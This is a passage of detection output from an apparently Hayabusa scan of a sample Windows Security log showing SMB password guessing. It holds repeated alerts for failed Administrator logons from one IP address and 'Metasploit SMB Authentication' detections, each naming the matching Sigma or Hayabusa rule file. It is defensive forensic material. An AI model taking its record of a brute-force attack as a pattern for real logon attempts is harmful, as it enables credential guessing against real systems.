Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 